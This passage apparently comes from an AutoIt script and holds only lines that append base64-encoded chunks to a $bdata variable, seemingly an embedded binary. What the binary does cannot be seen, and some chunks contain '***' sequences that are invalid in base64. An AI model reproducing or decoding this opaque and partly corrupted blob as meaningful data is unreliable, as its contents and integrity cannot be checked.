	$bdata &= "kHQhA9thFVJHqxyIOAng/CQR778hF/D80NI7ysJ7MP7AYQZ1D4lV7AEAKWTcsC97FQTeh5+nKxpLACFSwelphcBbwPQifEC4xJ2JEEziBPiP71EDgwH/MHTzTxYfYDR+PvEWHh1BcCCD34ADBmso+s4WatSxD+DwlXkOQRabLii2Jxe00EFeqWjqmkYmA9uNc7Qeg5Un4i9D+Le0CIHBsPSqg1APX9uNTiDghHoWEAUEbA5hqD0Z9ADiBjjfuYEGQDoyClwCug/JUAWTUHxZ+B6+3hwUPuwhQKiBosGHk8xP7OsIbqh6tkm+WKTXqfAQhZFodIHH/6ell6SxiIjdRY96fekc5a6CTBIOjRWrwRgsbNeJY2lfUKUl1gg034/g5JAQ7AuHqICVMABW00w4aUEr8aX8M1+iUcIGDWgklhKyBwgwxxsQvgCNKJLPdB1xVgnHK4b6U71Fxrm4KhFHsLFmrhs4cjwhFshloZMcybMBH5BIGDkmH"
	$bdata &= "uADw6rDifNNOIjOzwpm2MbXmM2QLNBhC3e233MCJlCggYWRHqkBSxovrCYBZCIr323YtpKF+3YgSCv6BRxDaKD4jv/SdyCsMzL8NAGGFghuykX4KYBwdgYM4bS/ZnffK134do8MnijBXHv/qMlMtGoIVgo4gYcDHth8dj6GmcFAZAp6o/gAyttNnQP4oApSSsC9vDv7ctxSzoogFgp26xchDKbIowgshoRQbUKM6iAHUoFBWKEWpxAqow6huAaH3CZSkfkRQmq3ALhWLOajBcO7D685K8KZrES+DKjZKDbWSct0BRL+0IsXdRIUNUkZ3isgwFhTOOsnIhFF1N1w+ClTUyhqVQcnGd1QXUUB3jkWBg8GpDhbXy4dFLeV//lXJVZDlY2t4EXQXiys+dZ8CidiA8e6snNfQygY8joPpf9+YcFh4RlXUuYjNchw6ye2omHCScALhH4YzOx4QnUDSiArGIppPjw4CB9Xs/wIszXrcQ4xdjQiO8"
	$bdata &= "Zy2pUQcI/ojPIDJyEc2Osszq0GDV+LhxsvKI1T54ZrvzNQYosDKwhfirDhh6GJc53uq1UBY8ekxgTx2gciVb/DifJAGAWMkfrL1sKJeGnkWuJLVptUD1DZz2Rv2k3ygH2ocwoPti5gd9riDLJACDX8ZrcxhW52/jZnAmEXOyByzFP/jEjbVLZeJuu3MAy05mjgxWyVVqQk+JSJjr4DrC3JjCDBENDOB3aJBLkE4ojUgwg4SMqLs5rdPyP2j/TsaP4e2Sz93ToCO94YcwhTN+tCViJwL/sPgftJL04hvKXgSo4XlWCGiaQxxZrCB4Q9EfRd/IxWLODC01Pd1hMHG4t2HLw24xvCSPbvqfVSBPAT6VafFRrvGYMZTvGsCEJrB0jfadhiRAgJdEd2uIZrPwRmuIkGIWZCCS3t9rhAcyQudbhWLLz4gXcfdRAdxkQ1vKKtn9wUEkHhJTeCsSoxXYNmJAJGgKcAX6c2HuEZa1WjBONjHLu95XJ"
	$bdata &= "YXetOa67AcDBklMz/hwJcgu5Rs3RmLUAmGCe5ATgDHLPDXSEE2Rk2Tki3Hi1H19cB7jtemy6EBkkYfnXzM/VbvlPYU1DMAV4ozbR4QCCXuJc7vSMVJti8Vw5QD4JMcU2BmFoM0hStczD88fzQ96zSdPxgMVtsxuKBVl3DuKhmJl54PBQmVAR+2ZkJ4rOLyA0xx1AYcQjDUGc71QFKcvBaVyTjjyujjGYCh65igkP6Je0v1Elmg5mne4hvC0+wjULzJRIWQoGyhcFwIOFIXKrEFyxog2cza8aa1IDBgk6rKaG908tOEP+J8vYagsbfckEiwfbYU1MZHBibgM***LqhwxKQelhAHNbbY1JePAQ4iR7HdESyBiRJMBxaNBPQufDLUDxYAsAA1m6UuIA1prZhmiBAIISYC9Ag2SA5DgZ1lQ6MdmYAZmJcAT4Rkr4rLLrJoxwpBz4wgkXxEVCLThzB7veDzQeIGjN1DtWoNvH/a8AhD77JA8FC"
	$bdata &= "igoq8ZEZxP8/jNWwxbT9Iz1uwIjQfwNqCsZQBKhprzArUAwEEBR0lHFhPSkQDGIn1DAYdhi4GEnjxstJ0UJH0scQ8UgaF99JuYKn4BCi4vD4TAgSWBwudAXjG1+Ay2cMJ2l8YViT2bENxJ1KMwgUdpB1qP9YoyKLNJbrGVQHz7AUTlhdZj6666ulhCydNljjgFHXeUGkQPdZ4i2UcIh7sLyOQIV6e0CQDMfDJQJWpUsEv60h6Fd0NLl2IcSLPJgPEO3B6w9YO80qVc9Ni0xjiz9o7UOyCMOG28Jy3/2JbGkYmcb+azyQeJH9bhRt9BlGOujgpBSyNaqE8r4nGuijDhJL0APObQ3cyRY7H4tRpzKwwnCAdhYmL4l+hnF1DUdq+nLyeTAMiok++CVUTnD/JlvYCPfzQjvTcxRWyRbUJlKigKbbOwhCXdNbJwl4+E2QOBwIEopExRSGjvDwW1+JzoDyMKBc+FNJwg+ksQE/OUf7mPhS/Lh3H"
	$bdata &= "bwhDQv7EvGxYldoDgAbw0Mzknxri0AILA6LDCYOFHCW1PiJNAhfJpNEaNOf2zv3/TQ+G/jX9P507sI6ADiJ71cAfIbrDeMCDtAnGKPxiAV1EFaIAhBi2PEzFDAO4gJZybTwA8JfBWYtfU30A8hHEjpNWYMh2/BRllBQFuBMGMPjI4gJJzAyspZ0OgtbZy1ktc197gRAz7yAR5A1ShDvbi8c5i5X+mxMKBIqKSJLjO2WfAPfUZoGFncat1C3retK622geAwNb1J90EVDdS0PempAgSAvIC4CLAMCChOLLbqeNNJceNiNDFP4fwH6VXhffic7fgx9IvQvgQ/jAigWO3gIfRG1bZpt4Ty4VXTY6wkVyH6Fo9MrjX4cV5chBPEHwjlODH4eTDC6h9GQyBcM9gBYs+1PogkEQTs6fOJZdAYuJGSAsxGzdrDdm1AhtOrrQois0I7wo6QruD7qdSFw43UKDSzhx//UBjVgZgNCM5dxPouEDBBn2x"
	$bdata &= "tQ9gzACtMLcG8czhT65xDJw33pk0YVCLU3fgWnwEzgIsRXUJrEg6ADu60giq61trQOuj5fetLTQqPLhFMaricCTVIWU8hWvAxTVRDrNFICnhNDGjkr6lOYZhf/5gLmWeq2UyMyQcALwhtSaIpFYMsgzMUAVgBGDbDCgNOjAhcKm0H6+H1iEPYEqYGqiPkKuFVHwiYBt2J+Gyba9gGB23Zd7kcQTHzzBg+MlsRPEJ92aCDBFbfGHwlhAOxZWfKrOdqBcXzrJ39E2Ae82ZrZmGgWRFMtJH4kzbIPSNcOVmNxlM4iUlhL9ZuLhIFtK5xfpE4QV0rB4QPiwxYYWqNvKl4QUEIQjzB8BlD0vblHgYlK+IMIASUIjQYQQjNhw8otAQv3x2Z3egoFCHgE+3xBEmMc7JDpRmji4XRQNYbH4amv2Y1Dnjqd8Nb89H0IPkE7ezy6cxTrH8ATlEkiMlR6OX6bdwZ1HoPEHhCKJNt13WADhVQI9lEg/jq"
	$bdata &= "qopBFTMkv3iCMNK2++WKNdxxW4NqEFgbXNs7G3iDNjvujN9EoGwTyymQEINU3K+ucCqcKnAjkYsEWkcJtcLlEsUo6hFtYdwwbXpIQ9izrXeJoNVrhDAJUU+DxTkciGXFWjU8U0o66MHOd67aexA1OAyl03AKDOZ59Crl92YZ7PEH6Doz6ekPmW+PA+LdsHNjM0cHiAuSWFoioiFPDsFibEJxQZnBwGFyfGJJqKgtb4bRxoH0MRhSImgm1iYgqobEUADYBM1WSUgoYeZShhnDEdF0SerBg0H5CtUTaYau4T0zZBPheKgEvMDyYhGmCLWSK62+YPBvwB702fMQCdDWNXznBDQ4OOy+bdO8ASiwMXDmATAqBtpn9hIQx4Lq5iZgGfGUarSxrCL808gy5s+se0RWgB8AXFXgL215g3DCyx3XrX+uyUpHHOLAz6Y5Zah02CFrtPtR7CNDONnl1IbkQkMosvpw3PrfG11hDavBTykV0y6u2DQds"
	$bdata &= "P6J0wP9v9cgMeCAhridK4TPe0Li4aC0FlBHATUN+Twmb3a5EBYMm0MAAgbCBup7OJsauvRQTbCBYDcS+ye2UhishrB5VEB4scriUENX4Vw3m6CCh+BwzgAQW+AASPS43Grurnv/jxHUW85W7W4NKTpS6JR0AGxsmaS7dDMQxBORls+DigwaeJbMLswh03AE1gtmQwsIRkNLAm+rdmETOdfFeF/XCp291A2oR/kO/uACeSQBZ13QqMw5KgorJUlqwSY1ENAzCz7KUEhMA7VBqhxwtPps8YUU6MmbuZqY3COHwovK4DH0SjpBm3A+3KGDjA1yJAtsM/JuwmASR6whmOXAILmA8QdJI9GEll0cxpbymBJITco2y9IkUxmtjDFRG6aJ7H5JqpMnGDGvSDIOoMiCVwPQMRu4MA2MY7WaDYFzgDAgObCEMDCxFHWt7E5vBE9NzxDlG/bVb/rN2CIvODb1HrGaJeC0+DAg65osUuE+YDQhREV+Vg"
	$bdata &= "FLwjJ9k6D6HR0z99B79VUwAWCkHPUg0nnCPC78EQRLhRwE6HFdwv///YYMAvb34A/eKrsn6tGb3w4YxDSB6sCSJgsaSYcoU/uYEGBQJK1hmhdu5CVcQuvZ5+AUIYs+630ZK6xxGd+vaS9EITAg4Me62chDr1j90QFEcEyqN00O0fol+5g8H+4CRHNJ/yxqwA+uFFw0ojKq+3wLUPYsKE/8wDBaPYQicwRxt8/880rV0DHejcwXpizkgCAwWEL9aNwNZBozc2yCNxgZ0iCChHz8FRVyJLIi4mnoNc2lcQY11KQhkFKT61FhMKpQ6G6iC+O5r9sgfNCCB/UBUJfhoEot2O74w9iCc7ecZ3T2CLO4SV4Kx+cHAT0D8/+vPbYsMZfu330Hvc5ndEBSDutg7jdhqZ2LDf5ODfdhRhDyvdW8N3kIQkgTP7YV+wYA8DcsMLyKNRWBnTog/ssAnkTDAgq1pvvoKU9uB0ICD0JZ3PnId3I0SlP93N8"
	$bdata &= "xPDobFnZ88w9ZiiQnevPFLO85ZmUU+av/r5ACNsDE2MaDlIrCJywZAJnYi2L8PXiAf++vZU4nYg/sAV2i1cNCH2qBfmWCHMGsdmeyV+fGiN0s3HVA0iIPleqtiP1GQA5Gih8aAUZQ54JE6gwincjMCgaYId4uJKimEkLDdAK8lB/EUgT0lAr5SEIRQuUxLdCyoZr4/3CI+farBzpzDG91zyZRc5ANDTGwhZInIPdVIYdXtIwSy8ufDHBMAEKL08kxAKznCMtpIAkNx2UHwsyJW7G8XBix6SS+GXnMQaIFYDED0eI1oYmDtkr7voIXt+O9668AnPWl8T4B8MP8KdEg/1r0RRmj0jYUnUJMD9euy5yDXdJr7cwo8IzhkkFtTag+mjYVFTnH0aMAGCKWn0nULwrHU3Uq1JQndXoZq4PFHbxCJsJiNoUMQGUYISFpyDXoMThEdsf2xCyGudChhJrNnpDEMrdqIdnCEGgREWWcDV1ywjiaOKu6"
	$bdata &= "OettsOQXY6JB1QC4VlHU16tJ8aQiYdSoMnJG+DHUyT0IMhCzBDv3DORB1TQY5EWz3goJeQvp14+tU6yucaU14hgFcRDvEGg4IHQOmuQh1EgzOQioDF9J02hGQGlLoxIsK3M/RxExaYZcpatYTuEko1go9R9qdEWioAyRp+I1wwiriSs1hlCwEH0oHdm6z/FKG8BFrDytZXTBixjY+KuFXOF/Rv7l/jXEEw+B0SRohMuji5/Ul9MSeVmECqOMQEbyEwwYUfF+IAOGHQQqEpwTDcvHSqGPCdGoIRpJiwoMBSi3igjZnJYAn1FMndO3CGZ1+BiFd/DkQnAAKtMoYdAlcU6TFlF8Fw+EwAbCBscXzQ/kTBrBwVZk5ArALXM98b4CQde7kGT8ZTC47gnk6O/4Cy6mHdyOhE+6wDVHiRMI7MLrG94oIiCWHAlNNBD0F8wobTQRB8TwgOZCPGMbjkJEL2YoIGBjZ24ocxvQdxvQ5dQopdcb061Xy"
	$bdata &= "Ksb0x7kY+MRPWZTFqSdjQy8sV+D5EtRH4GRadwSKNvbWJDf8fuxYuroGWAFT/7xQQYEnoC482VvrBWc0empopEsMkiQVG8yKNOU+VBxYCHmKVDK1QF6aAEoYimAg5IT8GItOGGyQMZK/ZETIlItGGDQBGBVbYyRIBnnJPxQgL70ADRyKdERyQn4ci04cbLBKHiV/yXWLRhzKFNZieISgcTAkDpRpyL7gR3XoAlfJnyG0OUEyISTIgy0nQ1I0JCQeAHk1f8qFyvlQkyZf7Qtvw5/KhUnZu7VIAxg7V5aJxgG7gVRxI6d4MVwdV8pKZctGoAB6EjbROqVp8vHXbAFvI0GyIoDNWghZeR8FiohDOBEBtM3L0S+s5Ix9y5pD2lBDxU7cOVAXNh4/4RLCqiCDeNoXzMZNVsH4Bc6+PyAQXABZCPSsZsHG8kIcFnJsLFDYBD7YMIuIQMWbdIsm6yiA+foin+l1EBy/LjA2DIrYwG/2/4rRgOK/g"
	$bdata &= "PoWcxWB4SAAAwSPRooOUkAD1f7S53ZGuJdK0IvmHQZKQJ3GSfOCYTPg5g8tnjBLcC+5R/QcPfaiBTWklSkUXK+gFYBmZo1wDFlQhvAWSUAraVGgBmopGB2N09OXATC8OBt4dtLMHqyuqcEk+dPGP52SbA4Ja8AMAysLC4YIiRRb4WIJp1Y1cAi72kdJX3Qi0lVFgRUGbgmYMSUR+RIgeSM2LJ+qVWWiIPIHySDBQMAQE3viTdxL/FkjhBXtEF30OCpDDKjsbeM3lCZmOQd0IRROYuBUECM7xjT3Fw/QfQo2MZ7PgI191F/ARzZ+i3MYA3XsmvgTd8K/OcH1No+KRwiIButz14xySzwCEGoOnEFgeQxjw9C0byvWVtkY2R7rT90M3UiB7Qw1LND86z0z/taVhEem68tXycrYCNbl6x4bPOIadwmIhb/EggYS3MbrozzEOIKPBkwgAGFkDOhfgYjwfC05exSWjhCowkJ75CMOIKaCBhR3zb"
	$bdata &= "Dls33o5FeUC7y3FYTBztAG2Q7tI9vJ8/Tg+zbPH8+TI+29BgYRHwY2zsmsgPBtf2/gIWlAvQnnV+FpfFASfofMpORg1xWCumZmgX/2D3QD4ZYeBTd7UEHYBSLHIK7GxbhCZos2/yD2dcRipACUWNGmDIVLA8DxfhDfGmm0Qw7LC8Hr4n4Sogu5trxQMFMRshTDOu4ZHRZsdT18BH6lPcmQqOYL5HiMZpirfjn+CQnYJd2O4uteljvf+ywEsaYwVtjP23Rohp2QfmN+ReqL/sbLFCEzSNDYKtCMr6xzB4s/QC7ydiaDP+imlvOpO/B3FjaEdsjCweZ8BuADULgkSmAS+DwYdEQk+gcZ6wjfcD0YohF78v3nsRAGA387KBQY0Af2ERiQXgU8OX6ASxNCEr6yFKC3iRnC2QDDcGK8rM4yaMgjoQzYfOq4RwsMQYjTC1hMhEpVCEyYYsKrZf8/1s5/pmLKa/8MV20NwDOt7ldV3g81qDGJjjg"
	$bdata &= "GrwuwWdNo0MF01DiJeIyC0Fv3DEp17qUC3AwPj4e3Vttz9cN9R1Ar0NDof4KQWVJcmOvDK/Y+opRGgo4RAVk6999mXh+opUdBO8h85K1AA/taCEzqpivDYMY4GMxFEftOgmoqCXfw6N2IZDYV0GFGXAwqcRfywYAfIQUwFAoYMPqaGYUVX/CQ+MFYSsMdCnAKXcYgxCryjIweG5itdQXka8kM6EokBEF3LQ+ugcIZ7N8ryMk6YOUgOP7LIH4dWIkojcMyUIHiCJ7AxeM9kBcwFLqtCLLkjNW2A1IXMCkoyTJSWmW9wPD30vbCkPiJ0Cai0uIr7FC7KiQeimw7+0LfLYyhdwHza/YMgN1haWsxAQ4r+7Db6ykw5CPkVCUAMewIy1h4CwwV9NREYfKQeugKjNVEBw4idotKWMmwhbQKXAgbhUs5FUNTsUMKP4/N35Q4GSAEaYqwGioCCgnboRImCQ9g2G8C99kbyUdmrCS/WxDaAApvo1Gb"
	$bdata &= "Si+Meiso2S5TOIHm+8tHDN9Rgnhu61ubSpSSboAn8QYYFdYKc+sPA3RggD3RDtMXHLHF19MSMwnbcFfy1BTpMb11gyqjpEC3OsGH5i4DUq+Yq7rLscOZQhgeWEoMZmB4FOUwCaRLtyZX8g4jmv4mE3dWkkIUeq3VHmfPvslM609miwA+EEYODcfhSFI/eAhmWKZWZevrMlJeJissWWtkvd0MJO0NLNdUjXHgI4jrx1CRszDykBcAxR/4TKMA3fOjnve2wOvr69UeBicOO0LeyTt5Lkk2cVIeWm+b3E5mBxd/b2oRLawuc4zqgdN5hRgCKui4glXEKziJDwP6khQGJkpAL3UNDNpUm/qgYSiqAQ8ZX9RqTEFq7p6SUORFDIA4KPeSnKQc1FpKZQ4QtgxYqiWsSkRLI2YVgbeVlnZCFHQPqBqq3wp4g+C/DZ4gO13wmiDx2bKoRXzOAU3oMokVDJben1+7JrIk1jaODj3KAFUgIBwk2gPaO"
	$bdata &= "g4+RwgynZ4I2LCyDkpcDEQSF5akKlgMBDvsfMrAgojQTat44GW4dTteBlJFFf7uuMKLc7d+iUMIXzzrEKXZ744JJiRmxwO8xhTswao7gHgU60oQdRkcT8PJBAwU8AidihJKdrXYKb7BbUz1hQcegBL9APD7UXjHQsgKAA/QBPWU4LooviGDdtG4oLBOC0BKJJv6S6g2Ys7JZjkIUhFHDeN+TeUKAtsOA+5/6wToFAAsByBZqXgIGOgfD837i0vF9UKnsU4vroLc9IWBjITcOXW3hQ0YgdiMN+tYvTIjFjI3T9h1D77z81MceD5uCjgPvzIPt4q1hcEsJIzO7ZutCp7HHiDZ2R/rF90M3XiVRzTtKEYDUYLToehI//oeEPgXejil8xRmOH4DmgWFD7saHEC4hyN7iRHrGUccjigWumJK/A88Ds/26CHRIN7X8QbYJg27du89FB79DyYHGy7ynrPbzxctB9fl6y730DX6Lm4GalDPVb1kB5"
	$bdata &= "ZG3LTM/3Hu0KoAZwEK2rQfFIx6/eO9LuOCIYd1DoOC64KAinhsQzfpiQ5m2L6SdHKNaAB+4H4DV9oMhHwekSsCZ+vUAJLQpJ4iCqYH25YKkBRkp4hUcN/f/FasjUYDUHnMnYZ609wSLvJ9A2oOWDlu/4mmxgQ3/0aICMZEN5xkLASn8BRGjJvKsQ0pBFDvDzl0k/yVLn7sV+uIwoFaB3fmweaghYloZu0E5GOncCEO5Hu08YjBNAwm2Rgywm5GdxBWo0FVIO2BcZz0aVULmCTIiKwEuDUYiqa0sGyOqEhq4mRsthZutJBOYiCsOZhHXhN21dmXOqiCoaK3WrhX7tg1JbQfbnQyGgWUgIeJzQfA7KyhUlm/uiAWIJD8/vvXliEZi9jrGBHdXbzrDhPZXRksmBVYRQQeneqjBw4c6Xae5GifMRBQGMuDFhCgKj7DgHLtIugHDqnXOHRLOzjaZwEKT3y+uM+hQtZtaRNAU5cQBqIrgBCV8Fk"
	$bdata &= "tfDY+Yr5hViISJhi0MCKaXpkDO3jb1YhYWGybngTUOLzLwOte4tO+BXS82SpW3Q7dTmYCno1JZngUQ53pKoxKCKUA+B8zrVbDD2PoCEZI6ugDIwpfN05IdR9AG3HBuWE2hBONn+sHTdOgYDA8yMW0ljJhdI1llP2Fnue9g/9GXQZuDkhQOjt5105uB1gWY6YHob5tcjV/bzpa9AGMhBLkcMIl4rUmd/ABEi+VFNoB3OTElQBn6Zg/MQIe30NyJHBFfCb2fCz9RwA3BhgI7qMHHYkoBrGqlreE2yuAiHVXvndZnxuHKYRAEP+ckwgVGhiJnPvLjW8z+LF1B18PBdbCnojUgEoVWOR5eP8LBnAEvT3xJeBiU8ZlXFK5NFZ0DIglgK1Jl52YT2QaS6O1JqHGBMh4w550aeJNiIvgi8t/Cr2sBUKtQCHby2kaX4BmDK3mxuvshkIKHHpagGqGrMcbEc9Eo9KEEh8unIJOotcohH4gX8EEL1tE"
	$bdata &= "e0ZWUx9MvAwE6zlFy5p4tCIbkJDGdzx0EWgK8UW29uaixhbrD2gIIRYZYEoTFq8If+tnYwYEdSKNcBB4IFIEAb4qqwB80Tol33C4ImhcZKeNnQTMVZqZjEuFiBZLYBTyQibHAjAg+puC6mXEGoADAY+H4vn4dNzhpTdGT+UQaYxsdd9UFMp4WZ+dFK5eyenZFi+NfcTfHNB0OwFHEUbQUvLIgw+BJe04/XR6B3zQSOwJdhC294kYggM3SMIAIGKX1gPdBhh1SJUSXBKostl5EAkIInQvKh8YWTreOo9CFOAIxDmEd3gUvHDPGAIKEMLC0IQ/HiUm4FLgdBcg71QdFyDsguQFlgqoqq7o8qQ6PbgtHOxmbpQKAP9mnmuIAgnMctHEGrqKJWI4CUJ4eEwVYRYI***UpViDKo1v7KVVahC0EcCpBw5FnA8o2yIkBhZqVbRGhgC+5YzdczqgLYEYxLLv1RxnsNPczn4MCQ2OcJLzBJdDb4pQh"
	$bdata &= "igQAO1epJJSlI4DbZxmt+p1OYefO9+JocAQHGikTqas2jGE7zpFd8R3dAQjGoNHV+tbnkzmwAsAZsxIOpGsWmYPdUSJB9C7BQkMNqgvoU3Qo5wBD0zDnAS0IwQQJvgmv4lNvLyPAosf4J+Vgfu3wCxxhp3ZF82omI1xUCQ49lWLBocO5nq6taUuNlVSdBgaGvZ8ThxTseMEmBCYH2Z2DCGvI8gOziAcDw8LmqAuG2p2F6tBO5eJdZRAfMxg0Rqg4E2kQCBTFYZ93bCq0xgPBruRyR0TAIN8B94Po7vJGAZQIl5SFwEhniCVlnqCB4CzIFwYTP0Bh2YouAsgPtTl6x7KuyUEVhfOV+sQmcQZcDR72MEMtUb7T+tuptTTDCZsKmeZJzzUZsPcE0ojVMCC3PCscCRIJLG+2MKosO/yKtzqdkbODKrRUqc+4FoJVIzQGC9ML1YrRrqn1qUWruSSFIoOfEjwVKqhYcPkInZMRD9CQWFAyUW0iD"
	$bdata &= "oZwsVGZDu0ouILOKXT5AY8RA/c403EV6KFVv9QQ0jh7DQODISK8+I/mRORnES0JrwR9ig6npQDLhp8WBAQJxBrwiTljMKToel2JGKVgO8igjSvpIxcAYFZko778ntVXJlLDxnSamlSIkIg6uKXdGsCN4y6pdAjwUnYugMWw07OViAFyiSNFTgNNE3b2lEgBBwYFEjXMh63QFmhs4xUo+tZeeftQHY9JqB6FIVAZqHDe7YYY+KB8TvPdjOxB0U2dlFQA/Jy+gRzyZopEii4kvCVNlTrBpRS7GxciAjasGwD4ryVFJgcwVIQwKXIrgw8GT/X/3a/BL3R6Gs5PHIOdwTahyIaUAgtUGQwFAMZn0d3CXJzA3PSEbBSHA1LEKhLGgoD6B1m3L9OACrId+aNbxj4t7I70KjRcwQrwZAZIpG4ILZ6vdj2eQHEXAGii8ehdE6mNgSDmQjCmA0MYgpWwjdRotn2Ji0kd9ncqhY8tQlP+2yqUhNDgrY"
	$bdata &= "+OwaMCAALGw11gupp8Huk9k08ZOChIG6M6zk18aJLrhQM6gPyfHD79nsTwusnIgJ1O0gMfBF/BQwIdgotASEUehuCHP3vVmt+A3QTkMF/BnzlO/Fy4Tsw7PmBKDQHVovPicZYRBicqOIVFTJ2GSn1m2KVagjkJHRdYB6Eow1BIEaJV4TJCz92SUAhkJ4DDp7sBffrYXh+5pUsMhifBYIHbAFGxUg7UxMJMFU+ECdVEF4zjRQUfmABXDGGV5R1HpEkz3I1CbpDOpkLVZkDTrXtDNhbiQNaukADx1pzmnhDa70gsokK6yrt4ejqS5IGIivJTBwzED0gwYkCNDcMTaCTiWVbZro29BHOw93IYI1MSbuY+JR+OhTD5ZQHAtZCYFlt9I4Qaq1fC4ThwDeD3qzkT+Vt5+agQ/7ACHuLSQSNBIGFvuRiN4uBeTRSCF0IYj9ySBRqBcihpmGR/4zIgBXBCH9YmPI43YXAKgVM/PJMRAohXgRZtLGj"
	$bdata &= "8D0F6LMAgwMyxbS2ptEAOFas+26KmXj59wxvG9PYtK9eDH8mUw+OyHgAi6b2btdLofFxgRVZhyxSFcClqDvTWAGf8ccPyJAMyIwr+FcmzaMxyxIChwQMzDT7JCgkCuCQTejIVBuZRNB9rSBg2pN+frAQfAuMOfCukh7t54DrTcIbBk2uIwxHssLW2n7s+hvmUolVEMHmAugwUjwDyzCFpDJuFcODYcRnP1QDxq91EGh1ZkuKMOi42H5lzhJLiRQmwARQ7SC14wJxA3KOhLy0jMjV6Vcw6ABW6wM4gAfpFNiSBqSG67+YAxg0uNeh94SM2OSB69+F21VhwcsB61V5gPplbzXy7NmLezwLRHw6tOh1JY9K1YAT4jR1IKLLMlaCyDpKikDlvE6wUFpLUO+JbPwAuusxxSPiJ2hsWbJl52ncp2FCUNxWAnYStgsra0wsVTCXFuDA+FAI5NcwC38MDvMZ6l3/wPzb99BDDITDdGo0iNgpgnVA0"
	$bdata &= "QfwEuBN6Fo28qskBsFAQ3BEPpSBB+NGOG1tomNmlOc4rDSkqUlCBDHO2ruXB7tSQD8ONELuPgkQEuvc02NqFOceCGZd0AF8zeSjUHp7080EIs44CzMAVWh/xdoLgjMHTcrmSLIu8fB66g5MU5ZXgt8m/pIBD30edEQRrp2gwQo6sDTJcSE4paN45FPJLD24VM3AZT69TpiifgiuNMeEDT+XB+i5/0Y0fdJBWhfLuwb0zw2S4QcB6+tVvQ6RpYGkNv0w2ARpReMFzcACehNGki1dhRGJuC66DoHPZQJpZUT9PAySmrgmcAlfk1q2KiZVia+QHqRhBau5Ul9dSQhtIodc/FAmRqEBLbtBCFYYQ7I5WEdFdEgHacPOf3gM0pE09Lf067AIUpv83MEltx6ETDSEJyVI//+Jcv8/CRs0v12Fx7Ql/OFkuvIZBeuMAjr0Yjzo7ngY/EhL6JRaSs7bcFAPae1+k0YprHDp7KYE4oHhTkAKneVNOp"
	$bdata &= "zxBGD5OwdlGnb8YtB4i334U+sVsIpFUEZXU8N1RY8RAktXxfCj84TGI99SvsBOKBTHfOt5JZE7kDb7hqgRegyI5lZINcbdIsCHLhyiOneAbwEppfwyrb+vuW1i5x2kbAZPDUz9vjgjOWH4AP8TiKRUdW1TpWw4IfcAriXbcrU0YS1FkMDOZg9JPkaW5P40gkP0bJPgstDcnjWYr35N9InDwQksJPddpMlDDueA6YgERpS6ZWmPZiLzUzIR9WLnZC1jKuOL0zSUkk2L2D4/PknAEE2DU3cuik4lyT1b6+d3aEoMZFeLCLIjgEM5J/M0swrN0mHPBiPojEbkWeyQ7kYSRhj259FFx0VvROh0dhEUp1h1yeNyTA2EEmo1H+3LLVQ8FFvVdwubAXTFkyeolYiXoWfJuHMAwJjyiC6oMOebjydIKGvvXmkZSinppvRPjjJSkJ/z1h2XB4tRMQgIq1qEQKRGLBTAHs1t1mBCNi7ofujoi0LwcWc"
	$bdata &= "YXhCENngcbit1kCYTD37HhYJGBeMsA9gRDaQZQcLGlGAlm9NZwDtEcLxCTnX4Ia3z1L6LKOoEJ27EDYAGK87+xCMNHGyrXSM25qXgnUR0cSMRhBdskXcOVrRlDwUP8K3rmYh9BxWBpokyhCZd1TmG0gjhK9CDgewtrm8XRHxRdpBoJgycEr/wX24aI6B+WQPZbp+CYTd7sV3JtVd3CDlcdAzbVIahf1FflaxgeBPU+JK2kIwgZWf8USJ9qyO0KJ2I1m5NfVDeGUygatb1ticLv9e3X8F7AtFHVfOhsghpa+ZqAZGW/D7pobFZBM4aUGVhJQ+tBIcBofUvYlMRQL5b5GEABJBTbHxlAfzpe4Cg62kQMECGHd4oY/iNkA7Ys8ow/7k8BLN3V/T7Vos11sYEW3N31nH7X6gBmRurCFPNJvAYzYvelJ0Tt8mA+DweEARKoPvCOKhvBGam69GfY0REpAnG6xCoClNlbKB+u0CxYO7QCNVPBOtC"
	$bdata &= "2ujZDvn46ATxKLhHDv8T1wTeSuTOBA0AWEG9Nt1uuwoLmlkLf3Eb3SYbjF7pZ1b2KR0mpY0E962WMdzQa1dyjZqoNNm7fmh5Eo8dT3***j857HtTCzg8ilzYCoGG2oer8GJe1E611BcJ1gE0cwcEwsVx/DzY4YYuIGjHkJBh8DYZQCLD0LhJYf4Z1nABzD1IYFljwxw6BVhKU9KJcIhsrJTAV6oYLHlQf/Ni7YjYEDy6fi6BZihkc/O89dxv2NhCyI1YPQfrvKCB9d0pDkFsvDmB9PKAEaIkA4IUWnE6OxKF9VtymaEQJbiFvGG9QAEhAr7GJyuSgb1MAMLZPaaFUAudVBRCCBar1tOK1CEm9XTw63l1xV7pUHngH9A4Cg/r3RArfEucI/Ymbfe/O8ZyygNAjr/xLo1LEMeI0YGTxoNM690PoB2kEdr89K9e8Hc2nvDLeDqOslDM0tDE5FFaNibGet07AuEW5Q/GPw0b64D2ReQCdS09O"
	$bdata &= "IvfBLAYBHVL5Vh35A+ECTrbOY/oinS4F9B2ESp2s0Yslw3ERiFSK884xoKQEtx9RSlgMKHSF6ExyCJlLjlo8UBEBhEu5U+8WsoTBzY6pFFGiGDFkEsqIJxG6+uQRKy9o02jU8AEjJSMm5X1v1MajIHjRKng65rRppQJE0BZSDAByZQyvkvhrPNqGR+Mnc/3lNoqUCz2UYQbVVQG6CZQNfTD4EbhjloAI8IrXJB0GNm4XwiwSHUZx0WQ4qGRZy4WEUDrB4AJKroGxnD6X21ubn/SEHQPCCB0QDB0NkB0AFbJDVSW6AcC3xhq7scOeoAMIDwRWDAaiEhwoNX0w4UOEu1n5QJAqgwszcAV/OvMi9fryAxYYOa5omskQJEFDSB07jlkdwaByfUbBKxBKoMQCAilE6CBnIrwQWvQspDah/xxOE0kGg0IdesjkQAcAFa4QgYhgYSOkKTiG5w6jUhOQDgxAyv4jZyzoAAOA0iku+v/SaCfRrIke7"
